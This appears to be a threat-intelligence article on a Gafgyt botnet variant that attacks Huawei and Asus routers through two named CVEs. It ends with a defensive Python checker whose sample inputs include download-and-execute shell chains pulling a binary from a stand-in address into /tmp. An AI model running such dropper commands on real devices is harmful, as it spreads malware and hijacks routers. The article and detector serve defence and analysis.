Gafgyt (also known as Bashlite) is one of the most common types of malware infecting IoT devices, and has been active since 2014. A new variant of this notorious malware continues to target small office and home office (SOHO) routers from well-known brands, including Huawei and Asus. Gafgyt’s core functionality remains the same, that is, attacking IoT devices with multiple hardcoded exploits in order to take control and harness their power for DDoS attacks. However, for this new campaign the Gafgyt author has introduced techniques designed to remove rival IoT malware.
- This Gafgyt campaign targets 48 different malware variants in an attempt to spread further than previous iterations of the malware.
- 56% of the malware species on the kill list are known rival IoT botnets (thingbots).
- Huawei HG532 and Asus routers are targeted in this new campaign through known vulnerabilities released in 2017 and 2018: CVE-2017-17215 and CVE-2018-15887.
- Gafgyt DoS attacks target game servers, specifically Valve Source Engine servers, which is in line with the age demographic we’ve seen creating IoT botnets.
- The Dropzone server IP is located in the US, inside the Hostwind hosting provider network.
Stage 1: SOHO Router Targeting via RCE CVEs with Exploits
In this campaign, Gafgyt is targeting the following Huawei and Asus routers:
Gafgyt uses two Remote Code Execution (RCE) vulnerabilities, both of which are more than a year old, to exploit targeted SOHO routers:
- CVE-2017-17215 (Huawei): An RCE vulnerability allowing an authenticated attacker to send malicious packets to the Universal Plug and Play (UPnP) service on port 37215 to launch attacks.
- CVE-2018-15887 (Asus): An RCE vulnerability that allows an authenticated remote attacker to execute arbitrary OS commands via service parameters.
Following the exploitation of the vulnerabilities, Gafgyt:
- Downloads the payload using the “wget” command
- Stores the payload in the “/tmp” directory
- Makes the payload executable (world-readable, -writable and -executable) using “chmod 777 <filename>”
- Runs the payload
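As an added defender's example (not code from the original article), the following Python checker looks for that four-step dropper chain in a captured shell command line, such as the command body of an exploit request logged by a honeypot or router. The sample command strings and the 203.0.113.10 address are constructed for illustration only.

```python
import re
import shlex

# The four post-exploitation steps listed above, in order.
STAGES = ("download", "store_in_tmp", "chmod_777", "execute")

def analyze_command_chain(cmdline: str) -> set:
    """Return the set of dropper stages present in one shell command chain."""
    found, dropped, in_tmp = set(), set(), False
    for cmd in re.split(r"\s*(?:;|&&|\|\||\|)\s*", cmdline):
        try:
            argv = shlex.split(cmd)
        except ValueError:
            argv = cmd.split()
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog == "cd" and len(argv) > 1:
            in_tmp = argv[1].rstrip("/") == "/tmp"
        elif prog == "wget":
            found.add("download")
            # Output file is "-O <file>" if given, else the URL's last path part.
            if "-O" in argv and argv.index("-O") + 1 < len(argv):
                name = argv[argv.index("-O") + 1]
            else:
                urls = [a for a in argv[1:] if a.startswith(("http://", "https://"))]
                name = urls[-1].rsplit("/", 1)[-1] if urls else ""
            if name:
                dropped.add(name.rsplit("/", 1)[-1])
                if in_tmp or name.startswith("/tmp/"):
                    found.add("store_in_tmp")
        elif prog == "chmod" and len(argv) >= 3 and argv[1] == "777":
            if argv[2].rsplit("/", 1)[-1] in dropped:
                found.add("chmod_777")
        elif prog in dropped and argv[0].startswith(("./", "/tmp/")):
            found.add("execute")
    return found

def is_gafgyt_dropper(cmdline: str) -> bool:
    """True when every stage of the wget -> /tmp -> chmod 777 -> run chain appears."""
    return set(STAGES) <= analyze_command_chain(cmdline)

# Constructed sample command strings (not taken from any real capture).
SAMPLE_CHAINS = [
    "cd /tmp; wget http://203.0.113.10/arm7; chmod 777 arm7; ./arm7",
    "wget -O /tmp/update.bin http://203.0.113.10/update.bin && chmod 777 /tmp/update.bin && /tmp/update.bin",
    "wget -O /home/user/readme.txt https://example.invalid/readme.txt; cat /home/user/readme.txt",
]

if __name__ == "__main__":
    print([(is_gafgyt_dropper(c), sorted(analyze_command_chain(c))) for c in SAMPLE_CHAINS])
```

The third sample downloads a file but never stages it in /tmp, sets 777 or runs it, so only the download stage is reported and it is not flagged.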